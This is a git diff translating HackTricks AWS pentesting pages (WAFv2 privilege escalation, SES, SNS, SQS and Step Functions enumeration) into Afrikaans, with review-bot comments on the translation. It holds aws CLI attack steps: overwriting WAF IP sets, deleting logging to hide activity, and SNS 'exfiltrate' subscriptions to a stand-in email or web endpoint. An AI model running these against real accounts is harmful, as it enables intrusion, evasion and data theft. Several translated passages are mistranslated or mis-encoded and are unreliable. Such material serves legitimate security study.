-The additional permissions would be needed depending on the protected resource type: - -- **Associate** - - apigateway:SetWebACL - - apprunner:AssociateWebAcl - - appsync:SetWebACL - - cognito-idp:AssociateWebACL - - ec2:AssociateVerifiedAccessInstanceWebAcl - - elasticloadbalancing:SetWebAcl -- **Disassociate** - - apigateway:SetWebACL - - apprunner:DisassociateWebAcl - - appsync:SetWebACL - - cognito-idp:DisassociateWebACL - - ec2:DisassociateVerifiedAccessInstanceWebAcl - - elasticloadbalancing:SetWebAcl +Die addisionele toestemmings sou benodig word, afhangende van die beskermde hulpbron tipe: +- **Assosieer** +- apigateway:SetWebACL +- apprunner:AssociateWebAcl +- appsync:SetWebACL +- cognito-idp:AssociateWebACL +- ec2:AssociateVerifiedAccessInstanceWebAcl +- elasticloadbalancing:SetWebAcl +- **Dissosieer** +- apigateway:SetWebACL +- apprunner:DisassociateWebAcl +- appsync:SetWebACL +- cognito-idp:DisassociateWebACL +- ec2:DisassociateVerifiedAccessInstanceWebAcl +- elasticloadbalancing:SetWebAcl ```bash # Associate aws wafv2 associate-web-acl --web-acl-arn --resource-arn # Disassociate aws wafv2 disassociate-web-acl --resource-arn ``` - -**Potential Impact**: Compromised resources security, increased risk of exploitation, and potential service disruptions within AWS environments protected by AWS WAF. +**PotensiĂ«le Impak**: Gecompromitteerde hulpbronne-sekuriteit, verhoogde risiko van eksploitatie, en potensiĂ«le diensonderbrekings binne AWS-omgewings wat deur AWS WAF beskerm word. #### **`wafv2:CreateIPSet` , `wafv2:UpdateIPSet`, `wafv2:DeleteIPSet`** -An attacker would be able to create, update and delete the IP sets managed by AWS WAF. This could be dangerous since could create new IP sets to allow malicious traffic, modify IP sets in order to block legitimate traffic, update existing IP sets to include malicious IP addresses, remove trusted IP addresses or delete critical IP sets that are meant to protect critical resources. 
- +'n Aanvaller sou in staat wees om die IP-selle wat deur AWS WAF bestuur word, te skep, op te dateer en te verwyder. Dit kan gevaarlik wees aangesien dit nuwe IP-selle kan skep om kwaadwillige verkeer toe te laat, IP-selle kan wysig om wettige verkeer te blokkeer, bestaande IP-selle kan opdateer om kwaadwillige IP-adresse in te sluit, vertroude IP-adresse kan verwyder of kritieke IP-selle kan verwyder wat bedoel is om kritieke hulpbronne te beskerm. ```bash # Create IP set aws wafv2 create-ip-set --name --ip-address-version --addresses --scope | CLOUDFRONT --region=us-east-1> 
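Review bot: the nested permission list under **Assosieer** / **Dissosieer** loses its indentation in this hunk (`- apigateway:SetWebACL` and the items that follow were two-space indented sub-bullets and now sit at the same level as the two headings), so the rendered page shows one flat list of fourteen items with no indication of which extra permission belongs to associate and which to disassociate; restore the leading spaces on those twelve lines. Three translations in the same hunk also change the meaning: `Toegangsbeheerlisensies` means licences, where the source's Access Control Lists is `toegangsbeheerlyste`; `ontploffings` means explosions, where the source says exploits (`uitbuitings`, or simply `exploits`); and `IP-selle` means IP cells, where the rest of the page uses `IP-stelle` / `IP stel`. Pick one term for IP set and use it throughout. The update command under `Opdrag om die Web ACL op te dateer:` is still fenced as json although it is a shell command; the line above that fence is already being rewritten here, so retagging it as bash would be a cheap fix.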
@@ -389,23 +370,19 @@ aws wafv2 update-ip-set --name --id --addresses --lock-t # Delete IP set aws wafv2 delete-ip-set --name --id --lock-token --scope | CLOUDFRONT --region=us-east-1> ``` - -The following example shows how to **overwrite the existing IP set by the desired IP set**: - +Die volgende voorbeeld wys hoe om **die bestaande IP stel te oorskryf met die gewenste IP stel**: ```bash aws wafv2 update-ip-set --name LegitimateIPv4Set --id 1a2b3c4d-1a2b-1a2b-1a2b-1a2b3c4d5e6f --addresses 99.99.99.99/32 --lock-token 1a2b3c4d-1a2b-1a2b-1a2b-1a2b3c4d5e6f --scope CLOUDFRONT --region us-east-1 ``` - -**Potential Impact**: Unauthorized access and block of legitimate traffic. +**PotensiĂ«le Impak**: Ongeoorloofde toegang en blokkering van legitieme verkeer. #### **`wafv2:CreateRegexPatternSet`** , **`wafv2:UpdateRegexPatternSet`**, **`wafv2:DeleteRegexPatternSet`** -An attacker with these permissions would be able to manipulate the regular expression pattern sets used by AWS WAF to control and filter incoming traffic based on specific patterns. - -- Creating new regex patterns would help an attacker to allow harmful content -- Updating the existing patterns, an attacker would to bypass security rules -- Deleting patterns that are designed to block malicious activities could lead an attacker to the send malicious payloads and bypass the security measures. +'n Aanvaller met hierdie toestemmings sou in staat wees om die gereelde uitdrukking patroonstelle wat deur AWS WAF gebruik word, te manipuleer om inkomende verkeer op grond van spesifieke patrone te beheer en te filtreer. +- Die skep van nuwe regex patrone sou 'n aanvaller help om skadelike inhoud toe te laat +- Deur die bestaande patrone op te dateer, sou 'n aanvaller die sekuriteitsreĂ«ls kon omseil +- Die verwydering van patrone wat ontwerp is om kwaadwillige aktiwiteite te blokkeer, kan 'n aanvaller lei om kwaadwillige payloads te stuur en die sekuriteitsmaatreĂ«ls te omseil. 
```bash # Create regex pattern set aws wafv2 create-regex-pattern-set --name --regular-expression-list --scope | CLOUDFRONT --region=us-east-1> [--description ] 
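Review bot: terminology drifts again in this hunk: `IP stel` here versus `IP-selle` one hunk earlier, and `gereelde uitdrukking` (a regularly occurring expression) where regular expression in the regex sense is `reëlmatige uitdrukking`, or just `regex`, which the bullet list below already uses. The blank line between the paragraph ending in `te filtreer.` and the bullet list has also been removed; CommonMark still starts the list, but keep the original spacing so the diff only shows translation changes.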
@@ -414,62 +391,51 @@ aws wafv2 update-regex-pattern-set --name --id --regular-express # Delete regex pattern set aws wafv2 delete-regex-pattern-set --name --scope | CLOUDFRONT --region=us-east-1> --id --lock-token ``` - -**Potential Impact**: Bypass security controls, allowing malicious content and potentially exposing sensitive data or disrupting services and resources protected by AWS WAF. +**PotensiĂ«le Impak**: Oorskry sekuriteitsbeheer, wat kwaadwillige inhoud toelaat en moontlik sensitiewe data blootstel of dienste en hulpbronne wat deur AWS WAF beskerm word, ontwrig. #### **(`wavf2:PutLoggingConfiguration` &** `iam:CreateServiceLinkedRole`), **`wafv2:DeleteLoggingConfiguration`** -An attacker with the **`wafv2:DeleteLoggingConfiguration`** would be able to remove the logging configuration from the specified Web ACL. Subsequently, with the **`wavf2:PutLoggingConfiguration`** and **`iam:CreateServiceLinkedRole`** permissions, an attacker could create or replace logging configurations (after having deleted it) to either prevent logging altogether or redirect logs to unauthorized destinations, such as Amazon S3 buckets, Amazon CloudWatch Logs log group or an Amazon Kinesis Data Firehose under control. +'n Aanvaller met die **`wafv2:DeleteLoggingConfiguration`** sou in staat wees om die logging-konfigurasie van die gespesifiseerde Web ACL te verwyder. Vervolgens, met die **`wavf2:PutLoggingConfiguration`** en **`iam:CreateServiceLinkedRole`** toestemmings, kan 'n aanvaller logging-konfigurasies skep of vervang (nadat dit verwyder is) om of logging heeltemal te voorkom of logs na ongeoorloofde bestemmings te herlei, soos Amazon S3-buckets, Amazon CloudWatch Logs loggroep of 'n Amazon Kinesis Data Firehose onder beheer. 
-During the creation process, the service automatically sets up the necessary permissions to allow logs to be written to the specified logging destination: +Tydens die skepproses stel die diens outomaties die nodige toestemmings op om te verseker dat logs na die gespesifiseerde logging-bestemming geskryf kan word: -- **Amazon CloudWatch Logs:** AWS WAF creates a resource policy on the designated CloudWatch Logs log group. This policy ensures that AWS WAF has the permissions required to write logs to the log group. -- **Amazon S3 Bucket:** AWS WAF creates a bucket policy on the designated S3 bucket. This policy grants AWS WAF the permissions necessary to upload logs to the specified bucket. -- **Amazon Kinesis Data Firehose:** AWS WAF creates a service-linked role specifically for interacting with Kinesis Data Firehose. This role allows AWS WAF to deliver logs to the configured Firehose stream. +- **Amazon CloudWatch Logs:** AWS WAF skep 'n hulpbronbeleid op die aangewese CloudWatch Logs loggroep. Hierdie beleid verseker dat AWS WAF die toestemmings het wat nodig is om logs na die loggroep te skryf. +- **Amazon S3 Bucket:** AWS WAF skep 'n emmerbeleid op die aangewese S3-emmer. Hierdie beleid verleen AWS WAF die nodige toestemmings om logs na die gespesifiseerde emmer op te laai. +- **Amazon Kinesis Data Firehose:** AWS WAF skep 'n diens-gekoppelde rol spesifiek vir interaksie met Kinesis Data Firehose. Hierdie rol stel AWS WAF in staat om logs na die geconfigureerde Firehose-stroom te lewer. > [!NOTE] -> It is possible to define only one logging destination per web ACL. - +> Dit is moontlik om slegs een logging-bestemming per web ACL te definieer. 
```bash # Put logging configuration aws wafv2 put-logging-configuration --logging-configuration # Delete logging configuration aws wafv2 delete-logging-configuration --resource-arn [--log-scope ] [--log-type ] ``` - -**Potential Impact:** Obscure visibility into security events, difficult the incident response process, and facilitate covert malicious activities within AWS WAF-protected environments. +**PotensiĂ«le Impak:** Obskureer sigbaarheid in sekuriteitsevents, moeilikheid in die insidentresponsproses, en fasiliteer oorgenoemde kwaadwillige aktiwiteite binne AWS WAF-beskermde omgewings. #### **`wafv2:DeleteAPIKey`** -An attacker with this permissions would be able to delete existing API keys, rendering the CAPTCHA ineffective and disrupting the functionality that relies on it, such as form submissions and access controls. Depending on the implementation of this CAPTCHA, this could lead either to a CAPTCHA bypass or to a DoS if the error management is not properly set in the resource. - +'n Aanvaller met hierdie toestemmings sou in staat wees om bestaande API-sleutels te verwyder, wat die CAPTCHA ondoeltreffend maak en die funksionaliteit wat daarop staatmaak, soos vormindienings en toegangbeheer, ontwrig. Afhangende van die implementering van hierdie CAPTCHA, kan dit lei tot 'n CAPTCHA-omseiling of 'n DoS as die foutbestuur nie behoorlik in die hulpbron ingestel is nie. ```bash # Delete API key aws wafv2 delete-api-key --api-key --scope | CLOUDFRONT --region=us-east-1> ``` - -**Potential Impact**: Disable CAPTCHA protections or disrupt application functionality, leading to security breaches and potential data theft. +**PotensiĂ«le Impak**: Deaktiveer CAPTCHA beskermings of onderbreek toepassingsfunksionaliteit, wat lei tot sekuriteitsbreuke en potensiĂ«le datadiefstal. 
#### **`wafv2:TagResource`, `wafv2:UntagResource`** -An attacker would be able to add, modify, or remove tags from AWS WAFv2 resources, such as Web ACLs, rule groups, IP sets, regex pattern sets, and logging configurations. - +'n Aanvaller sal in staat wees om etikette by te voeg, te wysig of te verwyder van AWS WAFv2 hulpbronne, soos Web ACLs, reĂ«lgroepe, IP stelle, regex patroon stelle, en registrasie konfigurasies. ```bash # Tag aws wafv2 tag-resource --resource-arn --tags # Untag aws wafv2 untag-resource --resource-arn --tag-keys ``` +**PotensiĂ«le Impak**: Hulpbron manipulasie, inligting lekkasie, koste manipulasie en operasionele onderbreking. -**Potential Impact**: Resource tampering, information leakage, cost manipulation and operational disruption. - -## References +## Verwysings - [https://www.citrusconsulting.com/aws-web-application-firewall-waf/#:\~:text=Conditions%20allow%20you%20to%20specify,user%20via%20a%20web%20application](https://www.citrusconsulting.com/aws-web-application-firewall-waf/) - [https://docs.aws.amazon.com/service-authorization/latest/reference/list_awswafv2.html](https://docs.aws.amazon.com/service-authorization/latest/reference/list_awswafv2.html) {{#include ../../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-services/aws-ses-enum.md b/src/pentesting-cloud/aws-security/aws-services/aws-ses-enum.md index bc6af90f1..2fa1895de 100644 --- a/src/pentesting-cloud/aws-security/aws-services/aws-ses-enum.md +++ b/src/pentesting-cloud/aws-security/aws-services/aws-ses-enum.md 
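Review bot: in the logging-configuration hunk of aws-wafv2-privesc.md the translated paragraph repeats the typo `wavf2:PutLoggingConfiguration` from the English source, and the heading just above it (unchanged context) carries the same typo; since the paragraph is being rewritten anyway, correct both to `wafv2`, which is the prefix used everywhere else in the file and in the linked service-authorization reference. Several word choices also need a second look: `oorgenoemde kwaadwillige aktiwiteite` means aforementioned malicious activities where the source says covert (`verskuilde`); `Obskureer sigbaarheid in sekuriteitsevents` is a calque, `verberg sigbaarheid van sekuriteitsgebeure` reads naturally; `geconfigureerde` is the Dutch spelling (Afrikaans `gekonfigureerde`); S3 bucket is rendered both as `S3-buckets` and as `S3-emmer` / `emmerbeleid` within three consecutive bullets; and `registrasie konfigurasies` in the TagResource paragraph refers to the same logging configurations called `logging-konfigurasie` a few lines earlier. Pick one rendering for each term across the file.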
@@ -2,45 +2,40 @@ {{#include ../../../banners/hacktricks-training.md}} -## Basic Information +## Basiese Inligting -Amazon Simple Email Service (Amazon SES) is designed for **sending and receiving emails**. It enables users to send transactional, marketing, or notification emails efficiently and securely at scale. It **integrates well with other AWS services**, providing a robust solution for managing email communications for businesses of all sizes. +Amazon Simple Email Service (Amazon SES) is ontwerp om **e-posse te stuur en te ontvang**. Dit stel gebruikers in staat om transaksie-, bemarking- of kennisgewingse-posse doeltreffend en veilig op groot skaal te stuur. Dit **integreer goed met ander AWS-dienste**, wat 'n robuuste oplossing bied vir die bestuur van e-poskommunikasie vir besighede van alle groottes. -You need to register **identities**, which can be domains or emails addresses that will be able to interact with SES (e.g. send and receive emails). +Jy moet **identiteite** registreer, wat domeine of e-posadresse kan wees wat met SES kan interaksie hĂȘ (bv. e-posse stuur en ontvang). -### SMTP User - -It's possible to connect to a **SMTP server of AWS to perform actions** instead of using the AWS API (or in addition). For this you need to create a user with a policy such as: +### SMTP Gebruiker +Dit is moontlik om te verbind met 'n **SMTP-bediener van AWS om aksies uit te voer** in plaas van om die AWS API te gebruik (of daarby). 
Hiervoor moet jy 'n gebruiker skep met 'n beleid soos: ```json { - "Version": "2012-10-17", - "Statement": [ - { - "Effect": "Allow", - "Action": "ses:SendRawEmail", - "Resource": "*" - } - ] +"Version": "2012-10-17", +"Statement": [ +{ +"Effect": "Allow", +"Action": "ses:SendRawEmail", +"Resource": "*" +} +] } ``` - -Then, gather the **API key and secret** of the user and run: - +Dan, versamel die **API-sleutel en geheim** van die gebruiker en voer uit: ```bash git clone https://github.com/lisenet/ses-smtp-converter.git cd ./ses-smtp-converter chmod u+x ./ses-smtp-conv.sh ./ses-smtp-conv.sh ``` +Dit is ook moontlik om dit vanaf die AWS-konsolweb te doen. -It's also possible to do this from the AWS console web. - -### Enumeration +### Enumerasie > [!WARNING] -> Note that SES has 2 APIs: **`ses`** and **`sesv2`**. Some actions are in both APIs and others are just in one of the two. - +> Let daarop dat SES 2 API's het: **`ses`** en **`sesv2`**. Sommige aksies is in albei API's en ander is net in een van die twee. ```bash # Get info about the SES account aws sesv2 get-account @@ -117,7 +112,6 @@ aws ses get-send-quota ## Get statistics aws ses get-send-statistics ``` - ### Post Exploitation {{#ref}} @@ -125,7 +119,3 @@ aws ses get-send-statistics {{#endref}} {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-services/aws-sns-enum.md b/src/pentesting-cloud/aws-security/aws-services/aws-sns-enum.md index cca4353cb..e6aae027c 100644 --- a/src/pentesting-cloud/aws-security/aws-services/aws-sns-enum.md +++ b/src/pentesting-cloud/aws-security/aws-services/aws-sns-enum.md 
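Review bot: in the Basic Information hunk of aws-ses-enum.md the SMTP policy block loses all of its indentation (`-    "Version": "2012-10-17",` becomes `+"Version": "2012-10-17",` and so on for every line of the policy); the JSON stays valid, but the diff now rewrites code that needed no translation, so keep the original whitespace. The headings in this file are only partly translated: `## Basiese Inligting`, `### SMTP Gebruiker` and `### Enumerasie` are translated while `### Post Exploitation` in the following hunk is not; either translate the headings consistently or leave them all in English, since readers navigate the sidebar by them. The sentence `Dit is ook moontlik om dit vanaf die AWS-konsolweb te doen.` has also been moved to sit directly under the closing fence with the blank line dropped; keep the blank line.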
@@ -4,18 +4,17 @@ ## SNS -Amazon Simple Notification Service (Amazon SNS) is described as a **fully managed messaging service**. It supports both **application-to-application** (A2A) and **application-to-person** (A2P) communication types. +Amazon Simple Notification Service (Amazon SNS) word beskryf as 'n **volledig bestuurde boodskapdiens**. Dit ondersteun beide **toepassing-naar-toepassing** (A2A) en **toepassing-naar-persoon** (A2P) kommunikasietipes. -Key features for A2A communication include **publish/subscribe (pub/sub) mechanisms**. These mechanisms introduce **topics**, crucial for enabling high-throughput, **push-based, many-to-many messaging**. This feature is highly advantageous in scenarios that involve distributed systems, microservices, and event-driven serverless architectures. By leveraging these topics, publisher systems can efficiently distribute messages to a **wide range of subscriber systems**, facilitating a fanout messaging pattern. +Belangrike kenmerke vir A2A kommunikasie sluit **publiseer/teken (pub/sub) meganismes** in. Hierdie meganismes stel **onderwerpe** in, wat noodsaaklik is om hoĂ«-deurset, **druk-gebaseerde, baie-naar-baie boodskappe** te fasiliteer. Hierdie kenmerk is baie voordelig in scenario's wat verspreide stelsels, mikrodiens, en gebeurtenis-gedrewe serverless argitektuur insluit. Deur hierdie onderwerpe te benut, kan publiseer stelsels boodskappe doeltreffend versprei na 'n **wye reeks van tekenaarstelsels**, wat 'n fanout boodskappatroon fasiliteer. -### **Difference with SQS** +### **Verskil met SQS** -**SQS** is a **queue-based** service that allows point-to-point communication, ensuring that messages are processed by a **single consumer**. 
It offers **at-least-once delivery**, supports standard and FIFO queues, and allows message retention for retries and delayed processing.\ -On the other hand, **SNS** is a **publish/subscribe-based service**, enabling **one-to-many** communication by broadcasting messages to **multiple subscribers** simultaneously. It supports **various subscription endpoints like email, SMS, Lambda functions, and HTTP/HTTPS**, and provides filtering mechanisms for targeted message delivery.\ -While both services enable decoupling between components in distributed systems, SQS focuses on queued communication, and SNS emphasizes event-driven, fan-out communication patterns. - -### **Enumeration** +**SQS** is 'n **ry-gebaseerde** diens wat punt-tot-punt kommunikasie toelaat, wat verseker dat boodskappe verwerk word deur 'n **enkele verbruiker**. Dit bied **ten minste-eens aflewering**, ondersteun standaard en FIFO rye, en laat boodskapbehoud toe vir herhalings en vertraagde verwerking.\ +Aan die ander kant is **SNS** 'n **publiseer/teken-gebaseerde diens**, wat **een-naar-baie** kommunikasie moontlik maak deur boodskappe gelyktydig na **meerdere tekenaars** te versprei. Dit ondersteun **verskeie tekenaars eindpunte soos e-pos, SMS, Lambda funksies, en HTTP/HTTPS**, en bied filtrasie meganismes vir geteikende boodskapaflewering.\ +Terwyl albei dienste ontkoppeling tussen komponente in verspreide stelsels moontlik maak, fokus SQS op gequeue kommunikasie, en beklemtoon SNS gebeurtenis-gedrewe, fan-out kommunikasiepatrone. +### **Enumerasie** ```bash # Get topics & subscriptions aws sns list-topics 
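Review bot: `publiseer/teken (pub/sub)`, `tekenaarstelsels` and `tekenaars eindpunte` in this hunk translate subscribe as draw/sign; the intended word is `inteken` / `intekenaar`, which the next hunk in this same file already uses (`intekenaars wat die protokol SQS gebruik`). The same paragraphs use the Dutch `naar` in `toepassing-naar-toepassing`, `baie-naar-baie` and `een-naar-baie` (Afrikaans `na`), the Dutch `meerdere` (`verskeie`), and `gequeue` for queued where `ry-gebaseerde` is already used two sentences earlier; `mikrodiens` should be the plural `mikrodienste`. The blank line before `### **Enumerasie**` was also dropped; the heading still renders, but keep the spacing consistent with the rest of the file.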
@@ -24,29 +23,28 @@ aws sns list-subscriptions-by-topic --topic-arn # Check privescs & post-exploitation aws sns publish --region \ - --topic-arn "arn:aws:sns:us-west-2:123456789012:my-topic" \ - --message file://message.txt +--topic-arn "arn:aws:sns:us-west-2:123456789012:my-topic" \ +--message file://message.txt # Exfiltrate through email ## You will receive an email to confirm the subscription aws sns subscribe --region \ - --topic-arn arn:aws:sns:us-west-2:123456789012:my-topic \ - --protocol email \ - --notification-endpoint my-email@example.com +--topic-arn arn:aws:sns:us-west-2:123456789012:my-topic \ +--protocol email \ +--notification-endpoint my-email@example.com # Exfiltrate through web server ## You will receive an initial request with a URL in the field "SubscribeURL" ## that you need to access to confirm the subscription aws sns subscribe --region \ - --protocol http \ - --notification-endpoint http:/// \ - --topic-arn +--protocol http \ +--notification-endpoint http:/// \ +--topic-arn ``` - > [!CAUTION] -> Note that if the **topic is of type FIFO**, only subscribers using the protocol **SQS** can be used (HTTP or HTTPS cannot be used). +> Let daarop dat as die **onderwerp van tipe FIFO** is, slegs intekenaars wat die protokol **SQS** gebruik, gebruik kan word (HTTP of HTTPS kan nie gebruik word nie). > -> Also, even if the `--topic-arn` contains the region make sure you specify the correct region in **`--region`** or you will get an error that looks like indicate that you don't have access but the problem is the region. +> Ook, selfs al bevat die `--topic-arn` die streek, maak seker dat jy die korrekte streek in **`--region`** spesifiseer of jy sal 'n fout kry wat lyk asof dit aandui dat jy nie toegang het nie, maar die probleem is die streek. #### Unauthenticated Access 
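Review bot: the only changes inside the bash block of this hunk strip the leading spaces from the continuation lines of the multi-line `aws sns publish` and `aws sns subscribe` commands (`-    --topic-arn ...` to `+--topic-arn ...`). The commands still run, because the trailing backslash carries them over, but nothing in the block needed translating, so the whitespace should be left as it was to keep the diff limited to prose changes.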
@@ -77,7 +75,3 @@ aws sns subscribe --region \ - [https://aws.amazon.com/about-aws/whats-new/2022/01/amazon-sns-attribute-based-access-controls/](https://aws.amazon.com/about-aws/whats-new/2022/01/amazon-sns-attribute-based-access-controls/) {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-services/aws-sqs-and-sns-enum.md b/src/pentesting-cloud/aws-security/aws-services/aws-sqs-and-sns-enum.md index 1da888587..c4f8d210f 100644 --- a/src/pentesting-cloud/aws-security/aws-services/aws-sqs-and-sns-enum.md +++ b/src/pentesting-cloud/aws-security/aws-services/aws-sqs-and-sns-enum.md @@ -4,10 +4,9 @@ ## SQS -Amazon Simple Queue Service (SQS) is presented as a **fully managed message queuing service**. Its main function is to assist in the scaling and decoupling of microservices, distributed systems, and serverless applications. The service is designed to remove the need for managing and operating message-oriented middleware, which can often be complex and resource-intensive. This elimination of complexity allows developers to direct their efforts towards more innovative and differentiating aspects of their work. +Amazon Simple Queue Service (SQS) word aangebied as 'n **volledig bestuurde boodskap-ry-diens**. Die hooffunksie is om te help met die skaal en ontkoppeling van mikrodiens, verspreide stelsels en serverless toepassings. Die diens is ontwerp om die behoefte aan die bestuur en werking van boodskap-georiĂ«nteerde middleware te verwyder, wat dikwels kompleks en hulpbron-intensief kan wees. Hierdie verwydering van kompleksiteit stel ontwikkelaars in staat om hul pogings te rig op meer innoverende en onderskeidende aspekte van hul werk. ### Enumeration - ```bash # Get queues info aws sqs list-queues 
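Review bot: in the `## SQS` hunk of aws-sqs-and-sns-enum.md the heading `### Enumeration` is left in English while the SES and SNS files in this same change translate it to `Enumerasie`; align the three files. In the translated paragraph `mikrodiens` should be `mikrodienste` (plural, as in the source), and `boodskap-georiĂ«nteerde` shows the same double-encoded `ë` seen in the WAF file, so the whole change should be checked for encoding before merge.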
@@ -18,9 +17,8 @@ aws sqs receive-message --queue-url aws sqs send-message --queue-url --message-body ``` - > [!CAUTION] -> Also, even if the `--queue-url` contains the region make sure you specify the correct region in **`--region`** or you will get an error that looks like indicate that you don't have access but the problem is the region. +> Ook, selfs al bevat die `--queue-url` die streek, maak seker dat jy die korrekte streek in **`--region`** spesifiseer of jy sal 'n fout kry wat lyk asof dit aandui dat jy nie toegang het nie, maar die probleem is die streek. #### Unauthenticated Access @@ -51,7 +49,3 @@ aws sqs send-message --queue-url --message-body - https://docs.aws.amazon.com/cdk/api/v2/python/aws\_cdk.aws\_sqs/README.html {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-services/aws-stepfunctions-enum.md b/src/pentesting-cloud/aws-security/aws-services/aws-stepfunctions-enum.md index 873629bba..7e65a0537 100644 --- a/src/pentesting-cloud/aws-security/aws-services/aws-stepfunctions-enum.md +++ b/src/pentesting-cloud/aws-security/aws-services/aws-stepfunctions-enum.md 
@@ -4,266 +4,253 @@ ## Step Functions -AWS Step Functions is a workflow service that enables you to coordinate and orchestrate multiple AWS services into serverless workflows. By using AWS Step Functions, you can design and run workflows that connect various AWS services such as AWS Lambda, Amazon S3, Amazon DynamoDB, and many more, in a sequence of steps. This orchestration service provides a visual workflow interface and offers **state machine** capabilities, allowing you to define each step of the workflow in a declarative manner using JSON-based **Amazon States Language** (ASL). +AWS Step Functions is 'n werksvloei-diens wat jou in staat stel om verskeie AWS-dienste in serverless werksvloeie te koördineer en te orkestreer. Deur AWS Step Functions te gebruik, kan jy werksvloeie ontwerp en uitvoer wat verskillende AWS-dienste soos AWS Lambda, Amazon S3, Amazon DynamoDB, en vele meer, in 'n reeks stappe verbind. Hierdie orkestrasiediens bied 'n visuele werksvloei-koppelvlak en bied **state machine** vermoĂ«ns, wat jou toelaat om elke stap van die werksvloei op 'n deklaratiewe manier te definieer met behulp van JSON-gebaseerde **Amazon States Language** (ASL). ## Key concepts ### Standard vs. Express Workflows -AWS Step Functions offers two types of **state machine workflows**: Standard and Express. +AWS Step Functions bied twee tipes **state machine workflows**: Standaard en Uitdrukking. -- **Standard Workflow**: This default workflow type is designed for long-running, durable, and auditable processes. It supports **exactly-once execution**, ensuring tasks run only once unless retries are specified. It is ideal for workflows needing detailed execution history and can run for up to one year. -- **Express Workflow**: This type is ideal for high-volume, short-duration tasks, running up to five minutes. They support **at-least-once execution**, suitable for idempotent tasks like data processing. 
These workflows are optimized for cost and performance, charging based on executions, duration, and memory usage. +- **Standard Workflow**: Hierdie standaard werksvloei tipe is ontwerp vir langlopende, duursame, en auditeerbare prosesse. Dit ondersteun **exactly-once execution**, wat verseker dat take slegs een keer uitgevoer word tensy herhalings gespesifiseer word. Dit is ideaal vir werksvloeie wat gedetailleerde uitvoeringsgeskiedenis benodig en kan tot een jaar lank loop. +- **Express Workflow**: Hierdie tipe is ideaal vir hoĂ«-volume, kortduur take, wat tot vyf minute duur. Hulle ondersteun **at-least-once execution**, geskik vir idempotente take soos data verwerking. Hierdie werksvloeie is geoptimaliseer vir koste en prestasie, en hef koste gebaseer op uitvoerings, duur, en geheuegebruik. ### States -States are the essential units of state machines. They define the individual steps within a workflow, being able to perform a variety of functions depending on its type: +States is die essensiĂ«le eenhede van state machines. Hulle definieer die individuele stappe binne 'n werksvloei, en kan 'n verskeidenheid funksies uitvoer, afhangende van sy tipe: -- **Task:** Executes a job, often using an AWS service like Lambda. -- **Choice:** Makes decisions based on input. -- **Fail/Succeed:** Ends the execution with a failure or success. -- **Pass:** Passes input to output or injects data. -- **Wait:** Delays execution for a set time. -- **Parallel:** Initiates parallel branches. -- **Map:** Dynamically iterates steps over items. +- **Task:** Voer 'n werk uit, dikwels met 'n AWS-diens soos Lambda. +- **Choice:** Neem besluite gebaseer op invoer. +- **Fail/Succeed:** Eindig die uitvoering met 'n mislukking of sukses. +- **Pass:** Gee invoer aan uitvoer of voeg data in. +- **Wait:** Vertraag uitvoering vir 'n bepaalde tyd. +- **Parallel:** Begin parallelle takke. +- **Map:** Dinamies herhaal stappe oor items. 
### Task -A **Task** state represents a single unit of work executed by a state machine. Tasks can invoke various resources, including activities, Lambda functions, AWS services, or third-party APIs. +'n **Task** state verteenwoordig 'n enkele eenheid van werk wat deur 'n state machine uitgevoer word. Take kan verskeie hulpbronne aanroep, insluitend aktiwiteite, Lambda funksies, AWS dienste, of derdeparty API's. -- **Activities**: Custom workers you manage, suitable for long-running processes. - - Resource: **`arn:aws:states:region:account:activity:name`**. -- **Lambda Functions**: Executes AWS Lambda functions. - - Resource: **`arn:aws:lambda:region:account:function:function-name`**. -- **AWS Services**: Integrates directly with other AWS services, like DynamoDB or S3. - - Resource: **`arn:partition:states:region:account:servicename:APIname`**. -- **HTTP Task**: Calls third-party APIs. - - Resource field: **`arn:aws:states:::http:invoke`**. Then, you should provide the API endpoint configuration details, such as the API URL, method, and authentication details. - -The following example shows a Task state definition that invokes a Lambda function called HelloWorld: +- **Activities**: Pasgemaakte werkers wat jy bestuur, geskik vir langlopende prosesse. +- Hulpbron: **`arn:aws:states:region:account:activity:name`**. +- **Lambda Functions**: Voer AWS Lambda funksies uit. +- Hulpbron: **`arn:aws:lambda:region:account:function:function-name`**. +- **AWS Services**: Integreer direk met ander AWS dienste, soos DynamoDB of S3. +- Hulpbron: **`arn:partition:states:region:account:servicename:APIname`**. +- **HTTP Task**: Roep derdeparty API's aan. +- Hulpbron veld: **`arn:aws:states:::http:invoke`**. Dan moet jy die API eindpunt konfigurasie besonderhede verskaf, soos die API URL, metode, en outentikasie besonderhede. 
+Die volgende voorbeeld toon 'n Task state definisie wat 'n Lambda funksie genaamd HelloWorld aanroep: ```json "HelloWorld": { - "Type": "Task", - "Resource": "arn:aws:states:::lambda:invoke", - "Parameters": { - "Payload.$": "$", - "FunctionName": "arn:aws:lambda:::function:HelloWorld" - }, - "End": true +"Type": "Task", +"Resource": "arn:aws:states:::lambda:invoke", +"Parameters": { +"Payload.$": "$", +"FunctionName": "arn:aws:lambda:::function:HelloWorld" +}, +"End": true } ``` +### Keuse -### Choice +'n **Keuse** toestand voeg voorwaardelike logika by 'n werksvloei, wat besluite op grond van invoerdata moontlik maak. Dit evalueer die gespesifiseerde voorwaardes en oorweeg na die ooreenstemmende toestand op grond van die resultate. -A **Choice** state adds conditional logic to a workflow, enabling decisions based on input data. It evaluates the specified conditions and transitions to the corresponding state based on the results. - -- **Comparison**: Each choice rule includes a comparison operator (e.g., **`NumericEquals`**, **`StringEquals`**) that compares an input variable to a specified value or another variable. -- **Next Field**: Choice states do not support don't support the **`End`** field, instead, they define the **`Next`** state to transition to if the comparison is true. - -Example of **Choice** state: +- **Vergelyking**: Elke keuse-reĂ«l sluit 'n vergelykingsoperateur in (bv. **`NumericEquals`**, **`StringEquals`**) wat 'n invoer veranderlike met 'n gespesifiseerde waarde of 'n ander veranderlike vergelyk. +- **Volgende Veld**: Keuse toestande ondersteun nie die **`End`** veld nie, eerder definieer hulle die **`Next`** toestand om na oor te skakel as die vergelyking waar is. 
